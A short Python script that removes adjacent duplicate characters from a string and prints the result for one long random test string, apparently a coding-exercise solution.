""" mw = self.mk_middleware({"provider_prefixes": { "+12": "YOUR-MNO", "+123": "YOUR-MNO", "+1234": "YOUR-MNO", "+12345": "MY-MNO", "+123456": "YOUR-MNO", }}) msg = self.msg_helper.make_inbound(None, from_addr="+12345") self.assertEqual(msg.get("provider"), None) processed_msg = mw.handle_inbound(msg, "dummy_connector") self.assertEqual(processed_msg.get("provider"), "MY-MNO") def test_no_provider_for_no_matching_prefix(self): """ If no prefix matches the address, the provider value will be set to ``None`` on the inbound message. """ mw = self.mk_middleware({"provider_prefixes": { "+124": "YOUR-MNO", "+125": "YOUR-MNO", }}) msg = self.msg_helper.make_inbound(None, from_addr="+12345") self.assertEqual(msg.get("provider"), None) processed_msg = mw.handle_inbound(msg, "dummy_connector") self.assertEqual(processed_msg.get("provider"), None) def test_set_provider_no_normalize_msisdn(self): """ If exactly one prefix matches the address, its corresponding provider value is set on the inbound message. """ mw = self.mk_middleware({ "provider_prefixes": { "083": "MY-MNO", "+2783": "YOUR-MNO", }, }) msg = self.msg_helper.make_inbound(None, from_addr="0831234567") self.assertEqual(msg.get("provider"), None) processed_msg = mw.handle_inbound(msg, "dummy_connector") self.assertEqual(processed_msg.get("provider"), "MY-MNO") def test_set_provider_normalize_msisdn(self): """ If exactly one prefix matches the address, its corresponding provider value is set on the inbound message. """ mw = self.mk_middleware({ "normalize_msisdn": {"country_code": "27"}, "provider_prefixes": { "083": "YOUR-MNO", "+2783": "MY-MNO", }, }) msg = self.msg_helper.make_inbound(None, from_addr="0831234567") self.assertEqual(msg.get("provider"), None) processed_msg = mw.handle_inbound(msg, "dummy_connector") self.assertEqual(processed_msg.get("provider"), "MY-MNO") def test_set_provider_normalize_msisdn_strip_plus(self): """ If exactly one prefix matches the address, its corresponding provider value is set on the inbound message. """ mw = self.mk_middleware({ "normalize_msisdn": {"country_code": "27", "strip_plus": True}, "provider_prefixes": { "083": "YOUR-MNO", "+2783": "YOUR-MNO", "2783": "MY-MNO", }, }) msg = self.msg_helper.make_inbound(None, from_addr="0831234567") self.assertEqual(msg.get("provider"), None) processed_msg = mw.handle_inbound(msg, "dummy_connector") self.assertEqual(processed_msg.get("provider"), "MY-MNO") def test_set_provider_on_outbound(self): """ Outbound messages are left as they are. """ mw = self.mk_middleware({"provider_prefixes": {"+123": "MY-MNO"}}) msg = self.msg_helper.make_outbound( None, to_addr="+1234567", from_addr="+12345") self.assertEqual(msg.get("provider"), None) processed_msg = mw.handle_outbound(msg, "dummy_connector") self.assertEqual(processed_msg.get("provider"), "MY-MNO") def test_provider_not_overwritten_for_inbound(self): """ If a provider already exists for an inbound message, it isn't overwritten. """ mw = self.mk_middleware({"provider_prefixes": {"+123": "MY-MNO"}}) msg = self.msg_helper.make_inbound( None, to_addr="+345", from_addr="+12345", provider="OTHER-MNO") processed_msg = mw.handle_inbound(msg, "dummy_connector") self.assertEqual(processed_msg.get("provider"), "OTHER-MNO") def test_provider_not_overwritten_for_outbound(self): """ If a provider already exists for an outbound message, it isn't overwritten. """ mw = self.mk_middleware({"provider_prefixes": {"+123": "MY-MNO"}}) msg = self.msg_helper.make_outbound( None, to_addr="+1234567", from_addr="+345", provider="OTHER-MNO") processed_msg = mw.handle_outbound(msg, "dummy_connector") self.assertEqual(processed_msg.get("provider"), "OTHER-MNO") def test_provider_logs_no_address_error_for_inbound(self): """ If the from_addr of an inbound message is None, an error should be logged and the message returned. """ mw = self.mk_middleware({"provider_prefixes": {"+123": "MY-MNO"}}) msg = self.msg_helper.make_inbound( None, to_addr="+1234567", from_addr=None) processed_msg = mw.handle_inbound(msg, "dummy_connector") self.assertEqual(processed_msg.get("provider"), None) self.assert_middleware_error( "Address for determining message provider cannot be None," " skipping message") def test_provider_logs_no_address_error_for_outbound(self): """ If the to_addr of an outbound message is None, an error should be logged and the message returned. """ mw = self.mk_middleware({"provider_prefixes": {"+123": "MY-MNO"}}) msg = self.msg_helper.make_outbound( None, to_addr=None, from_addr="+345") processed_msg = mw.handle_outbound(msg, "dummy_connector") self.assertEqual(processed_msg.get("provider"), None) self.assert_middleware_error( "Address for determining message provider cannot be None," " skipping message")
41.459821
79
0.630343
1,069
9,287
5.25725
0.119738
0.059786
0.059786
0.04484
0.81032
0.800356
0.774733
0.748221
0.726335
0.723488
0
0.023092
0.249273
9,287
223
80
41.64574
0.782989
0.142457
0
0.650685
0
0
0.177454
0.006897
0
0
0
0
0.191781
1
0.130137
false
0
0.013699
0
0.171233
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
74786f79345d33d879c08d04d1f7b830de6cd146
11
py
Python
tall.py
philiptrae/teknakurs
50f37fe14daaeca952b97cb3e49cf8c609a7475f
[ "MIT" ]
null
null
null
tall.py
philiptrae/teknakurs
50f37fe14daaeca952b97cb3e49cf8c609a7475f
[ "MIT" ]
null
null
null
tall.py
philiptrae/teknakurs
50f37fe14daaeca952b97cb3e49cf8c609a7475f
[ "MIT" ]
1
2020-03-02T18:09:41.000Z
2020-03-02T18:09:41.000Z
a=[1,2,3];
5.5
10
0.363636
4
11
1
1
0
0
0
0
0
0
0
0
0
0
0.3
0.090909
11
1
11
11
0.1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
false
0
0
0
0
0
1
1
1
null
0
0
0
0
0
0
0
0
0
0
1
0
0
1
0
0
1
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
74997f909a3788cec02da019c265634f6d10dad6
91
py
Python
src/__init__.py
sarthaxxxxx/AAI-ALS
48703525eb3490e2ba5cb555dc69fd9d10bf859a
[ "MIT" ]
1
2021-06-03T04:16:10.000Z
2021-06-03T04:16:10.000Z
src/__init__.py
sarthaxxxxx/AAI-ALS
48703525eb3490e2ba5cb555dc69fd9d10bf859a
[ "MIT" ]
null
null
null
src/__init__.py
sarthaxxxxx/AAI-ALS
48703525eb3490e2ba5cb555dc69fd9d10bf859a
[ "MIT" ]
null
null
null
from .loss import * from .models import * from .tools import * from .runner import trainer
18.2
27
0.747253
13
91
5.230769
0.538462
0.441176
0
0
0
0
0
0
0
0
0
0
0.175824
91
4
28
22.75
0.906667
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
74a2689f039096440175d756bf6f41e9552c7d9e
181
py
Python
django/contrib/gis/gdal/base.py
jpmallarino/django
659d2421c7adbbcd205604002d521d82d6b0b465
[ "BSD-3-Clause", "0BSD" ]
61,676
2015-01-01T00:05:13.000Z
2022-03-31T20:37:54.000Z
checkerista/.env/Lib/site-packages/django/contrib/gis/gdal/base.py
LybaFatimaNasir/CS311S20PID02
bc29a8c4c9ee508c74d231c015a57b1ca4dfcb39
[ "MIT" ]
8,884
2015-01-01T00:12:05.000Z
2022-03-31T19:53:11.000Z
checkerista/.env/Lib/site-packages/django/contrib/gis/gdal/base.py
LybaFatimaNasir/CS311S20PID02
bc29a8c4c9ee508c74d231c015a57b1ca4dfcb39
[ "MIT" ]
33,143
2015-01-01T02:04:52.000Z
2022-03-31T19:42:46.000Z
from django.contrib.gis.gdal.error import GDALException from django.contrib.gis.ptr import CPointerBase class GDALBase(CPointerBase): null_ptr_exception_class = GDALException
25.857143
55
0.834254
23
181
6.434783
0.608696
0.135135
0.22973
0.27027
0
0
0
0
0
0
0
0
0.104972
181
6
56
30.166667
0.91358
0
0
0
0
0
0
0
0
0
0
0
0
1
0
false
0
0.5
0
1
0
1
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
1
0
0
6
77706b655274f443964d068b9edb8b67d0fad362
65
py
Python
aula18.py
lhardt/PythonCourse
c0654bfc589f5faf1c26f419917683a0a2d6a0de
[ "MIT" ]
null
null
null
aula18.py
lhardt/PythonCourse
c0654bfc589f5faf1c26f419917683a0a2d6a0de
[ "MIT" ]
null
null
null
aula18.py
lhardt/PythonCourse
c0654bfc589f5faf1c26f419917683a0a2d6a0de
[ "MIT" ]
null
null
null
# Shallow Copy meta.append(arr) # Deep Copy meta.append(arr[:])
10.833333
19
0.692308
10
65
4.5
0.6
0.355556
0.622222
0.755556
0
0
0
0
0
0
0
0
0.138462
65
5
20
13
0.803571
0.338462
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
0
0
0
0
1
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
0
0
0
0
0
6
77745557be22d6ecd552560854aa1ad92ae5e98d
142
py
Python
setup.py
Shakil-Mahmud-Programmer/Currency-Exchange-System-GUI-
7bcd342591edf9468fc1da80242966ff76a41772
[ "MIT" ]
null
null
null
setup.py
Shakil-Mahmud-Programmer/Currency-Exchange-System-GUI-
7bcd342591edf9468fc1da80242966ff76a41772
[ "MIT" ]
null
null
null
setup.py
Shakil-Mahmud-Programmer/Currency-Exchange-System-GUI-
7bcd342591edf9468fc1da80242966ff76a41772
[ "MIT" ]
null
null
null
import subprocess subprocess.run('pip install tk') subprocess.run('pip install requests') subprocess.run('pip install pycopy-webbrowser')
28.4
48
0.78169
18
142
6.166667
0.5
0.351351
0.432432
0.621622
0
0
0
0
0
0
0
0
0.105634
142
4
49
35.5
0.874016
0
0
0
0
0
0.456522
0
0
0
0
0
0
1
0
true
0
0.25
0
0.25
0
1
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
0
0
0
0
0
6
77b2369349daaf703172e5a5b0f7043175b7576e
203
py
Python
jova/splits/__init__.py
bbrighttaer/jova_baselines
336ec88e6069e16ab959cbd38aa58730e15e2e0a
[ "MIT" ]
3
2020-08-17T22:03:34.000Z
2021-09-08T11:52:24.000Z
jova/splits/__init__.py
bbrighttaer/jova_baselines
336ec88e6069e16ab959cbd38aa58730e15e2e0a
[ "MIT" ]
null
null
null
jova/splits/__init__.py
bbrighttaer/jova_baselines
336ec88e6069e16ab959cbd38aa58730e15e2e0a
[ "MIT" ]
1
2020-12-21T12:10:04.000Z
2020-12-21T12:10:04.000Z
""" Gathers all splitters in one place for convenient imports """ from __future__ import print_function from __future__ import division from __future__ import unicode_literals from .splitters import *
20.3
57
0.817734
26
203
5.846154
0.653846
0.197368
0.315789
0
0
0
0
0
0
0
0
0
0.142857
203
9
58
22.555556
0.873563
0.280788
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0.25
1
0
0
null
0
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
77e4715af0db51c9efb74a294431a3d9065c3e56
86
py
Python
pipeline/loggers/__init__.py
HSE-LAMBDA/RheologyReconstruction
fe89dea28ab0873d075e69c51e9ae2aeb07fe8e2
[ "Apache-2.0" ]
1
2021-01-12T11:43:31.000Z
2021-01-12T11:43:31.000Z
pipeline/loggers/__init__.py
HSE-LAMBDA/RheologyReconstruction
fe89dea28ab0873d075e69c51e9ae2aeb07fe8e2
[ "Apache-2.0" ]
null
null
null
pipeline/loggers/__init__.py
HSE-LAMBDA/RheologyReconstruction
fe89dea28ab0873d075e69c51e9ae2aeb07fe8e2
[ "Apache-2.0" ]
null
null
null
from .tensorboard_logger import TensorboardLogger # from .logger import GenericLogger
28.666667
49
0.860465
9
86
8.111111
0.666667
0.328767
0
0
0
0
0
0
0
0
0
0
0.104651
86
2
50
43
0.948052
0.383721
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
7acf02d76b945702db1d5fb40d686d68a034532f
48
py
Python
neispy/__init__.py
kijk2869/neispy
c6ff7982d35660d2d2bf69e8cef67b37e6137374
[ "MIT" ]
null
null
null
neispy/__init__.py
kijk2869/neispy
c6ff7982d35660d2d2bf69e8cef67b37e6137374
[ "MIT" ]
null
null
null
neispy/__init__.py
kijk2869/neispy
c6ff7982d35660d2d2bf69e8cef67b37e6137374
[ "MIT" ]
null
null
null
from .client import Client from .error import *
16
26
0.770833
7
48
5.285714
0.571429
0
0
0
0
0
0
0
0
0
0
0
0.166667
48
2
27
24
0.925
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
7ad381d354b6e8acccb6ace42115a7c9431ad04a
68
py
Python
tests/bad_servers/no_init.py
MSLNZ/msl-loadlib
60f100221774e7c8bac067b50f427fd1d99d2552
[ "MIT" ]
51
2017-02-20T18:13:18.000Z
2022-03-02T21:46:36.000Z
tests/bad_servers/no_init.py
MSLNZ/msl-loadlib
60f100221774e7c8bac067b50f427fd1d99d2552
[ "MIT" ]
31
2017-02-20T18:09:43.000Z
2022-03-02T15:21:37.000Z
tests/bad_servers/no_init.py
MSLNZ/msl-loadlib
60f100221774e7c8bac067b50f427fd1d99d2552
[ "MIT" ]
15
2017-02-20T18:13:25.000Z
2020-04-06T12:27:43.000Z
from msl.loadlib import Server32 class NoInit(Server32): pass
11.333333
32
0.75
9
68
5.666667
0.888889
0
0
0
0
0
0
0
0
0
0
0.072727
0.191176
68
5
33
13.6
0.854545
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0.333333
0.333333
0
0.666667
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
1
1
0
1
0
0
6
bb0bbb9fa3e7e39bf316166058f7301e3221a253
3,053
py
Python
utils/migrations/0001_initial.py
remigermain/chernobyl-disaster.org-backend
28f45a1946c7052246421444522208880369e263
[ "MIT" ]
1
2022-02-16T06:19:06.000Z
2022-02-16T06:19:06.000Z
utils/migrations/0001_initial.py
remigermain/chernobyl-disaster.org-backend
28f45a1946c7052246421444522208880369e263
[ "MIT" ]
1
2022-03-12T01:01:54.000Z
2022-03-12T01:01:54.000Z
utils/migrations/0001_initial.py
remigermain/chernobyl-disaster.org-backend
28f45a1946c7052246421444522208880369e263
[ "MIT" ]
null
null
null
# Generated by Django 3.1.1 on 2020-10-01 10:21 from django.conf import settings from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [ ('contenttypes', '0002_remove_content_type_name'), migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [ migrations.CreateModel( name='Issue', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('date', models.DateTimeField(auto_now_add=True)), ('created', models.BooleanField(default=False)), ('object_id', models.PositiveIntegerField()), ('uuid', models.CharField(max_length=200)), ('message', models.TextField()), ('content_type', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='contenttypes.contenttype')), ('creator', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='issue_creator', to=settings.AUTH_USER_MODEL)), ], options={ 'ordering': ['-id'], 'abstract': False, }, ), migrations.CreateModel( name='Contact', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('date', models.DateTimeField(auto_now_add=True)), ('created', models.BooleanField(default=False)), ('email', models.EmailField(max_length=254)), ('message', models.TextField()), ('creator', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='contact_creator', to=settings.AUTH_USER_MODEL)), ], options={ 'ordering': ['-id'], 'abstract': False, }, ), migrations.CreateModel( name='Commit', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('date', models.DateTimeField(auto_now_add=True)), ('created', models.BooleanField(default=False)), ('object_id', models.PositiveIntegerField()), ('uuid', models.CharField(max_length=200)), ('updated_fields', models.TextField(blank=True, null=True)), ('content_type', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='contenttypes.contenttype')), ('creator', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='commit_creator', to=settings.AUTH_USER_MODEL)), ], options={ 'ordering': ['-id'], 'abstract': False, }, ), ]
44.897059
177
0.580085
297
3,053
5.794613
0.272727
0.032539
0.048809
0.0767
0.732714
0.732714
0.732714
0.732714
0.732714
0.732714
0
0.012733
0.279725
3,053
67
178
45.567164
0.769895
0.01474
0
0.633333
1
0
0.118097
0.025615
0
0
0
0
0
1
0
false
0
0.05
0
0.116667
0
0
0
0
null
0
0
0
0
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
bb20dda4881babcbbe510e339b203dcec69326a1
8,452
py
Python
removDup.py
zsyc/LeetAlgo
70793a26900824e308f69ec2b2299e04eb9c7646
[ "MIT" ]
null
null
null
removDup.py
zsyc/LeetAlgo
70793a26900824e308f69ec2b2299e04eb9c7646
[ "MIT" ]
null
null
null
removDup.py
zsyc/LeetAlgo
70793a26900824e308f69ec2b2299e04eb9c7646
[ "MIT" ]
null
null
null
def removeDuplicates(s: str) -> str: i = 0 while i < len(s)-1: if s[i] == s[i+1]: s = s[i+2:] if s==0 else s[:i]+s[i+2:] i = 0 if i==0 else i-1 else: i+=1 return s print(removeDuplicates("gnyogdbncigrwnjjtqtyregqyhkinjxgzmkpxskloxjcensflhhxlpfkrcmuctrrqahjlmziiupsenyaagbamdkxgqswexvffjygshlkcvdmjypmpduactfnlezrltjirqntomjomkkjdotvlfjafboajhklqvboluugoorigqswfzblnzqmxrootnudnqenmtffuzhallvqmlvmhvulbasxmbtfytqrpdxthbfezwfmaenimwnjhxjhtncyhmlazjjlqxtavunztuhhxduzbwnunjeiorsjnqqtkpoomfpoomshvaolvhkaeldunxvaheorqjjsvbxijmeftlsglnijdfgnpeisacakcyogdvwaeanzinmzecqzptmaqymdtcnctdyqukzxjjoqgllpyzmoaqdbiurwgdnxzaavdvjfoplymjkhzailvdqoohdrwihokdxzfqnnpsccfwfappvpozccxfefflqpstzzxvjpgdwenirlsxfkcstwvuatmturxgczkriaalhoqylrnrullmqajxrxvmkeyrcogpjwralyvxhdinhsfeksbwdtywbdnmucgdukrcltsjqehvkbhqmhvarpupvgwxqydnbrvmxmqlddaqvalnewursnrvlcofejwjryexpvglkyjkrgigpewxdbfoacmnxjqzqumtjmyjcmnukfotapbfybhnnbgtnyvneoiiiabqonoqaykrtopgdvcnwcfhqeamvbwzgmzrjegszfzgxfasgvicxqxmllgvhqzypaapfrjrmgrwdpcvfgdgkmkwmlyymybryxyunjzglpfqbwhihtsvujejryntmqldlgtegkwxmzwfqjexuiznzycstunbzpcfrlmocijwoclexdzdkkgeflesklphhsqteplpscgsjhfrmxmwstpljhsvcqyuscnvuadidyprjqyoygvgwozqigmxtstoetsfjvvdpmmfbfnpijjybxquvfaxsfrzlecwboqqlqbffhqaynmfhfbanspotydwtdllbolveyjwrkrvnpcdmgtsikrfylusoyyqrpglmviwqzebuoxslildwbjlimytbsvrypkwgdqdcwxkbtlvklhiwhytbqycipvtuiuebszihybdrzpobnszrdhdltnnrbqbvqxjrpltvxydhmwbwswkgxzrpupoxhtdercsvhkizpjwqlqtncvyufaxtjdznojtvbplgfzgtuvrtuujfhxcxupddmduklodecnxtlgszswmowszfrqakrqnsvnvipyadbruuknkijpphdtbkxveyijdoaflwdetbagvqhksabyapmvlufeftzfkvxzrhasuianvslpfcikzrdvghokiwntuouiadysnghymcyvnworaecsffciwsmrxzcsopmifigkxbqmdsgtelajmgabzxgsqqtanmkebcpwudwwsmtfaqrxiyohfymgqcifgyvydqtpvzbrhwhntnhwrflrrayknllojkdijbbupaklzvpzlxofjiidyllitjtgxfvhxzhxbngdjvbamlouxrtfzgtfqyuthhlhiiwropqlsxazzqcjpomvwctotidohpaavhvuiwljdzeycjasacdedxpdlkxkqukhueicdxdzrbgpagenspiyuguowbmsydcxfldnfdstyqeacyrdbrbicepwevbhugzecqengmpadgkksqyycnqeilfyomjtmyulgavbogsibfoajcoqsblehgvivoibhkwuulvzawebjbusbpnthtidkgivptcwqgeealdmmsfzdlsksqyvfogzxirsyupfphvndljblgiklherznezjoqratdpaubvdicijbqiemtcfjghzxkbrryttfhpusfbkhmgmmoexltbhsoflpqdmwvhpgzkdqwpszznjimvlwhmwqpinnorgjpptpwxpwgagtubszwvgiczsfzwrmvrjwvwupapsiolbzbjitxjedfyughkzpkhujvkahsxyblsewzanydmzwlgmjvftwmsbjecdosfikvhjrqqhxmehavbyeemteuqvgoxjkpgvgrlabpypckbkkoqfauyuqojtmxmyzwgtxfgxqoxaahzpkbrbtuymrgdxmrfqmwbrpjnkqzdolptzcwmnvjxkbdahyytikvvbandzfhjjbaogoxxfyjbraqjjmoyiibmfterpaxrkreymmtpfjvztgquwbxkxrvfkegvaxwktzhvfrykrvsyrixjpfrbmzcoszektofgdpdfvqsbjfygregsygkhdfndqhoijkzloradgzbwjpnavwzdrnvptsdgfmapqmhaoakadjybfqgorzcnkaojmcotombnchjdskxavyrjtpwcjgaoilcyvqalofltksjildedotsitktyzenywwvtttuyimlnbtoxlazvmjiwvvdeikdzmuitdbxufvtdmypsunrpdnqxfcobdkfvsojfwnifscjcvypndgbyjqntwfxflyktjbpjqsnfkqpbwuahoyhgeoouulkbcnfkqlxqfynefjkwitpsmnsrhficxzcyobzodyvrvskzqeivwytfpjnqmmiuyvvzsmuqyqkolvaccbyqixtbljwhisxilhadwqejoazilbizmuzyolnfpvxfguikclbsdsgpdtezexgcrlbkkpgnftwtqtdfztkhwxwbhwlcxeinmsiiivskkrjpvznuukjzxiyajbpduurpakyigieabqdiopchzechzllywazexaqiegwmldblzylsxahzspbgwnvfklluljgolyztuonjxxhpwkyuykafgvparuerfyynxygqhtelsildgeqvcsxkmpteyotadxwnxcybayrlgvtkmlsaxcoalarzbvgbonaafidquicefrcrytzgqgxosduscpilmbbrlnriyrfsracyctdmunsmzoytixvdgrroyfapjwztamzurqwcdcbqmwvhorwtjukxjbhktvwmqhysoyvcwzzprewkgmjcfdhhohgimpzltltzxinlpukbcaevgghltiwnlbozzfitkxncpjjminjzjrhvxbgvfcuzfcpsdlcklxmbdfafqixwlmfyuckxdoyeqceiqqxysygjdlwrzkiqwihaqotvacvuadhwlfcpgazbpahgmxhqnbjuuwnkdrbtypuboeiwendakeejucjudqjwvbuqfemilgvytqsjismxlgrqltwekymjlyqzeqpjhdgacklbsfyspxnqxcyqzvqmgihhuhpbavrhdpkjqmvusvkemobcmmmuostueklvejcoyqmsjlgiuzzypvxjlvskzlkntyaiippsurcowvrnymwukxazmfnurbjgidyjzbgmqwjcfmnssdebzkavddltmsooxgbczfjhpiammeuhnzqdushgcadvluimeysgtjyznyqqqmenmadaborhcncuqutravcrthhfmthsbicnfevimbpbishsrraksjwlvdwonecuvoeevmyhmtxstkvlxenpmkkygiiyqzfrsvpxrpflpccnzvnqnbexajvciibqkhzvizcgvwnetisxyailxkrxjkkoankqyigyrmjclaqrzxyffkzcnnfhwgqgmiwpkjtgnjwvohconiugobjtnxpevvvqsxtrvhbdmmjjltkxlfkselygkyjkbkktzwqadejsgxwsqhxrjgsgmqxmlwnqbotshysrhyqpxqbiqlyzxanxcqwryaeadjjhlbpgwrfixaialnjtplrgxiafbslmjmblexbuczzllrkivtjoyinaxhdaxeklkakwgtifpdnepryvqekumvhvkqwqdhvxnmxivhsosiwhbfysmdenpcyqvjfgldyfiusdxtliiprkkdvmdzwcmgkitpbsxoyzucuijiljjgvopispzuwtltkidxsybztgyczzsgvudyvvwejqqdqjatodzltqucgnstoemxcotgqdvdrzytddqamurevcpndikbsrfhgiitwrzpaecookkciybfvwmodedewgofydbfqfgwuhyjuhskdpdtujducgoxogjfsouqkhkfplnvoqywnwnonrltolbgzjohdxlwobucbuwghkdulemgryelbclvwkwijlsyrlzocybrqhcfmpovcbmfvfikegaqpdzkpvbfmkezlxpseeisbnwncjlolumwzikksrkxhfkllyureidpmmrtkkvkjbumdnmpxitrlxqlktwrtqdgatdazmqrztrmvknijwormqebfgnfbbncfggmzfvfkzsexmyrxrcvuipjulrmgwvmejztilytfjjyhuutslzhpwasosxqoothdspqinvbjhgrrzbbbmzedhdwfzihznptdggxgflqaiavtctifhlcshebkfajbcdxwngkikdzytddbebzayrphmmobhvvaodgntojbhvaemxzffwqpdmsqjoujbhxjoasbayfpdgjfulvfcrgwslnyqyqdmzfhxvufcotpzdwyhxqsisvonqgsplgsxqogblheybufdwddutmsyfuvfjgyccrfgawhzqejocwjguihzdvyfzeaimvtcdcjqrzcuwzvqrgjrdhjpnfkppprgqvgpivfikpdzkkjkgtusrvujdxltvsrhchzcgdvucnzzyskwdntywzqbwzzarwirgxmokhdixuoqrxhexmsbytnrcfkpxyldalbkqauihsxlcrbqjzzobwsensohnqprzxusmewymtkdfcolfhwxqippmksmlrnlfqlhrenldnjzxqdrtjjygcwqbdhtqicpkqwhmdevlsgmobqosqjmpffoeixbxxrhvrumebtgimhiijhtdrppzhiuhrunmrvzbswlzgvymmgqwihuoflwwhaywajadpfzojkjhdncqtrfpaqqfagvwcntbkdqhzkciwlapkomodmqyxwtquypbbjdefmezkerketzctzdoiislfmleaufovnpabwychebmvxlnkjsfybfuoxsoomxgioiomzauwaspldxwrntkvawlcovclrkfonxdvkazqtzazsanoqwzozlyryyotdxxaiosmfugkrgclmxbvvscmlgbpqmluctdvicyhirqmfvcblaaattivahnrxhhfgxccklbrcbvlbkjwpultvhathockapgjhtrkfrdqrreantgyishlmqmwxubmyxvjdmelwatuqgticskxchgzfueeglpizljgqwdwcowuvmeufsscdgljkobyqikworwzgddwdasgwehoxxcvdxykualubmrzhtwvvrpnburqtuygvzjuypuojbcuaiqidfywduhpuyqfksxzooadifrokqjxmrpqmdmakpbnswdhtfzmxsivqeervgfzyrmyftnoxauluiiecabgmoquqtywzwgkltrgzygxeuphhpgydtyxnobwfornvqitfcwatqjnogpteroweniwnkeehkgnahxaaqsdgvwbltozxewnqblchuacnkpzjxgvaoywrufaseezukagdoabsqmihrctxmcxgstcjsxvdxqzodlfezoegtwzkkoshhxcsfzkzbyclhhjfxzspjfewflnfyspwupkrvwyykgvzhwhabxpdofyaeryazdqfmlipwtlnlfadqnbwfnrqrzceigjrcbubuoonhywhcxajdclvpbnrjcxxbvgyyganyqszugltgonbynqzvqoflqkxwijvdemyobvbmkqctfbpmpcdxpwcmmbupmkefntdldjvrkqukotlebzwyenuajedcgwjrrcqhfktzvlysxbjpauhkjrfkvudtefkdxsaywuhqjbwybfcorchxdcleidjwafrqxlcmcmrxkmpzcazdgdlxyxoebzknsxrdsobttyncpgdxccoxhqmohiwwtqgflnedlavzisporhtbhzizggmwarrckwowcxhzyvjpbvbatduzrudsmezkhzfxchyizgsjwsllmplbtcdtotkzepwsrrddmwvpgwmwhqsnfkyhzmfhymzwhhvqgnixjsqtrxvrdjdbitwxrlnuovbwtqrtnqmauznxhqlsoylhtummzrkopngaelgmjzgsbotpndmimipiozinfxnskmqbuzjhwnmuoxwrngfrplzytzlzmfhvwgvcldmzmauvhhovriwzkixrmshtanxacgryjamqbsfakxynmlylqgirberwaaaaauczpsgscppglpndnnnqdlgospkypvafxiwspkhsobxgvsemqvtmpsluigwmdwqipzrkeyawxxplibsenftdymuavxvnxuutqvzwjbezzgrlpzmpmvjfyudcbqdjhkrmhykjoaiywqvnzrhfihenbwlenwibzldkyrsdqfrcfrlgkbkkscceohmlobydzsphyoitoaoexrdcqjsfkopecyywgazzfftugzykmtymuurwikeoivibpfwtxvekpidkbgrnqkgdwvyofxpnxihgrpahtkwlackzawblhhevosqpodrcxnljqikojnpmhonbogxnvszqlxmrfpjkiwcbsflawkejxnnhtdtzxpnmhdggshhrgapvptobkkogamtdpzeuskdhiyuhkeysxbktqneiqmfksxklqrxfozpakjjmiiqwljdmkgqzgwssqbpjsiqzmumpiynjuwknkdozxicwcdliabidlovhqpkcpjbnwprjnvxxlqzbfcisxxvtltolvslqrgsjqlibhtmlzppcfqriyovojwliqlgyybyrkopnhxfmwtliozuvfjwovqyjhayojbnlkegveqoahwdnpdnaxcbzrnjlqmmlvprejbbjpytaizkjdsalkvsjkxhhohlhkpasgkkdsnvbnwaiwzlaeryuuorxevqwqfevlegfnavetxgykukwoazrjkzimbecpllxuoeonnfcdekzurlphocsqfwhvidekpojgongdguzzkxshfcygxmtwfxvynrgwoursradnecinkuzhctelpyecxsxlqhstgpqfwkbfxsumxcmczkdopgxbbytegpqbimjpwfcyloenxgluiturfokzalymywqdemncrajozxnyrdgyulacxgmmktpagkrpsdmfbvublbwkouexgoclqozuvgzshudfscnlufbclkbkrubjfrbnhpxxnszcyifmsdykbocwocvqoytozfkgwmeiczobuvwrucfjelntebzblroiqsbteocdptimlcjcuwecbfgrbpwnqmasbrtlyeqezyesnszbjnjnvzabwylchplvadoklzwykazdlambaixczmdhteioflodvscdzrwgedapbvjcbdulvlvqulgbbahxlojejzgavpkfviutyklsmfrcjruljtgtvlifosigvsvybmjbcpfcbxybdqpdkmndcjyyefbjnymfuwvwevhqryoqqfcwwkqwnngjcorpqyealbdqiwktlqkwmuhcckaqtqdspcpcuoshjypfvvcjzmcfcanblrbwpacejfefcjlpcbcqyuisngcjmqhueuliyacwpuztjgunhbetupfpetfhmiskwwygwptpsemeebvvrkumzwkbwshptbhudoctvbidokgwdfvfs